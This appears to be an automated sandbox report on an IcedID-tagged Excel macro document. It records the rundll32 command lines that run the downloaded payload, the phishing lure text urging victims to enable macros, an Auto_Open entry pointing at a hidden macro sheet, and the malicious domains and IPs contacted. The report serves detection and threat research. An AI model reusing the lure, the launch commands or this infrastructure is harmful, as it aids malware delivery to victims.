Loading ...

Play interactive tourEdit tour

Analysis Report statistic-207394368.xlsm

Overview

General Information

Sample Name:statistic-207394368.xlsm
Analysis ID:403864
MD5:cd5e9899a7fa08e45309f4cf728bedf5
SHA1:a8671b54099e2d201660d220fc5652d3576bd5e6
SHA256:0465986113ca6df44638d99a67706662f7336e90c00d981666ba22217cefcfb5
Tags:IcedIDxlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: System File Execution Location Anomaly
Yara detected MalDoc1
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 2932 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 1908 cmdline: rundll32 ..\jordji.nbvt1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1148 cmdline: rundll32 ..\jordji.nbvt11,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sharedStrings.xmlJoeSecurity_MalDoc_1Yara detected MalDoc_1Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2932, ProcessCommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, ProcessId: 1908
    Sigma detected: System File Execution Location AnomalyShow sources
    Source: Process startedAuthor: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2932, ProcessCommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, ProcessId: 1908

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: statistic-207394368.xlsmMetadefender: Detection: 18%Perma Link
    Source: statistic-207394368.xlsmReversingLabs: Detection: 34%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: unknownHTTPS traffic detected: 192.254.233.89:443 -> 192.168.2.6:49694 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.5.2:443 -> 192.168.2.6:49697 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: \KnownDlls32\WININET.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
    Source: global trafficDNS query: name: industrialarttextile.com
    Source: global trafficTCP traffic: 192.168.2.6:49694 -> 192.254.233.89:443
    Source: global trafficTCP traffic: 192.168.2.6:49694 -> 192.254.233.89:443

    Networking:

    barindex
    Yara detected MalDoc1Show sources
    Source: Yara matchFile source: sharedStrings.xml, type: SAMPLE
    Source: Joe Sandbox ViewIP Address: 192.185.5.2 192.185.5.2
    Source: Joe Sandbox ViewIP Address: 192.254.233.89 192.254.233.89
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownDNS traffic detected: queries for: industrialarttextile.com
    Source: jordji.nbvt11.0.drString found in binary or memory: http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4
    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
    Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
    Source: unknownHTTPS traffic detected: 192.254.233.89:443 -> 192.168.2.6:49694 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.5.2:443 -> 192.168.2.6:49697 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing ,please g ere was a ro cm s artlng .Nordji.nbvt11 from the yellow bar above / ,
    Source: Screenshot number: 8Screenshot OCR: Enable Editing from the yellow bar above i Once You have Enable Editing , please click Enable Co
    Source: Screenshot number: 8Screenshot OCR: Enable Content i from the yellow bar above 0 ) WHY I CANNOT OPEN THIS DOCUMENT? I i I W You ar
    Source: Document image extraction number: 7Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Document image extraction number: 7Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 17Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
    Source: Document image extraction number: 17Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: statistic-207394368.xlsmInitial sample: EXEC
    Source: statistic-207394368.xlsmInitial sample: CALL
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: statistic-207394368.xlsmInitial sample: Sheet size: 22188
    Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="5" lowestEdited="6" rupBuild="9303"/><workbookPr filterPrivacy="1"/><bookViews><workbookView xWindow="8595" yWindow="0" windowWidth="4020" windowHeight="3120"/></bookViews><sheets><sheet name="Sheet1" sheetId="9" r:id="rId1"/><sheet name="Sheet2" sheetId="4" r:id="rId2"/><sheet name="Sheet3" sheetId="7" r:id="rId3"/><sheet name="Sheet4" sheetId="8" r:id="rId4"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet2!$AO$115</definedName></definedNames><calcPr calcId="145621"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
    Source: classification engineClassification label: mal84.troj.expl.evad.winXLSM@5/12@2/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$statistic-207394368.xlsmJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{C074BD0F-C856-44A0-9DC0-75FD501B48C8} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
    Source: statistic-207394368.xlsmMetadefender: Detection: 18%
    Source: statistic-207394368.xlsmReversingLabs: Detection: 34%
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt11,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServerJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt11,DllRegisterServerJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: statistic-207394368.xlsmInitial sample: OLE zip file path = xl/media/image4.png
    Source: statistic-207394368.xlsmInitial sample: OLE zip file path = xl/media/image2.png
    Source: statistic-207394368.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: statistic-207394368.xlsmInitial sample: OLE zip file path = xl/media/image3.png
    Source: statistic-207394368.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: statistic-207394368.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: rundll32.exe, 00000001.00000002.379945627.00000000047D0000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.373921236.0000000002D70000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: rundll32.exe, 00000001.00000002.379945627.00000000047D0000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.373921236.0000000002D70000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: rundll32.exe, 00000001.00000002.379945627.00000000047D0000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.373921236.0000000002D70000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: rundll32.exe, 00000001.00000002.379945627.00000000047D0000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.373921236.0000000002D70000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    statistic-207394368.xlsm6%VirustotalBrowse
    statistic-207394368.xlsm21%MetadefenderBrowse
    statistic-207394368.xlsm34%ReversingLabsDocument-Office.Downloader.EncDoc

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    anaheimdermatologists.com3%VirustotalBrowse
    industrialarttextile.com0%VirustotalBrowse

    URLs

    No Antivirus matches

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    anaheimdermatologists.com
    192.185.5.2
    truefalseunknown
    industrialarttextile.com
    192.254.233.89
    truefalseunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4jordji.nbvt11.0.drfalse
      high

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      192.185.5.2
      anaheimdermatologists.comUnited States
      46606UNIFIEDLAYER-AS-1USfalse
      192.254.233.89
      industrialarttextile.comUnited States
      46606UNIFIEDLAYER-AS-1USfalse

      General Information

      Joe Sandbox Version:32.0.0 Black Diamond
      Analysis ID:403864
      Start date:04.05.2021
      Start time:13:29:27
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 22s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:statistic-207394368.xlsm
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Run name:Potential for more IOCs and behavior
      Number of analysed new started processes analysed:8
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal84.troj.expl.evad.winXLSM@5/12@2/2
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xlsm
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      192.185.5.2statistic-2072807337.xlsmGet hashmaliciousBrowse
        statistic-207394368.xlsmGet hashmaliciousBrowse
          catalog-1521295750.xlsmGet hashmaliciousBrowse
            catalog-1521295750.xlsmGet hashmaliciousBrowse
              statistic-1048881972.xlsmGet hashmaliciousBrowse
                statistic-1048881972.xlsmGet hashmaliciousBrowse
                  f.xlsmGet hashmaliciousBrowse
                    f.xlsmGet hashmaliciousBrowse
                      statistic-118970052.xlsmGet hashmaliciousBrowse
                        statistic-118970052.xlsmGet hashmaliciousBrowse
                          14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                            14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                              diagram-1732659868.xlsmGet hashmaliciousBrowse
                                diagram-1732659868.xlsmGet hashmaliciousBrowse
                                  diagram-1732659868.xlsmGet hashmaliciousBrowse
                                    diagram-1732659868.xlsmGet hashmaliciousBrowse
                                      diagram-136896931.xlsmGet hashmaliciousBrowse
                                        diagram-136896931.xlsmGet hashmaliciousBrowse
                                          diagram-993959417.xlsmGet hashmaliciousBrowse
                                            diagram-993959417.xlsmGet hashmaliciousBrowse
                                              192.254.233.89statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                statistic-207394368.xlsmGet hashmaliciousBrowse
                                                  statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                    statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                      statistic-118970052.xlsmGet hashmaliciousBrowse
                                                        statistic-118970052.xlsmGet hashmaliciousBrowse
                                                          14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                            14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              industrialarttextile.comstatistic-2072807337.xlsmGet hashmaliciousBrowse
                                                              • 192.254.233.89
                                                              statistic-207394368.xlsmGet hashmaliciousBrowse
                                                              • 192.254.233.89
                                                              statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                              • 192.254.233.89
                                                              statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                              • 192.254.233.89
                                                              statistic-118970052.xlsmGet hashmaliciousBrowse
                                                              • 192.254.233.89
                                                              statistic-118970052.xlsmGet hashmaliciousBrowse
                                                              • 192.254.233.89
                                                              14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                              • 192.254.233.89
                                                              14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                              • 192.254.233.89
                                                              anaheimdermatologists.comstatistic-2072807337.xlsmGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              statistic-207394368.xlsmGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              statistic-118970052.xlsmGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              statistic-118970052.xlsmGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                              • 192.185.5.2

                                                              ASN

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              UNIFIEDLAYER-AS-1USstatistic-2072807337.xlsmGet hashmaliciousBrowse
                                                              • 192.254.233.89
                                                              statistic-207394368.xlsmGet hashmaliciousBrowse
                                                              • 192.254.233.89
                                                              presentation.jarGet hashmaliciousBrowse
                                                              • 50.87.249.219
                                                              presentation.jarGet hashmaliciousBrowse
                                                              • 50.87.249.219
                                                              GK58.vbsGet hashmaliciousBrowse
                                                              • 192.185.21.136
                                                              catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                              • 192.185.20.98
                                                              catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                              • 192.185.20.98
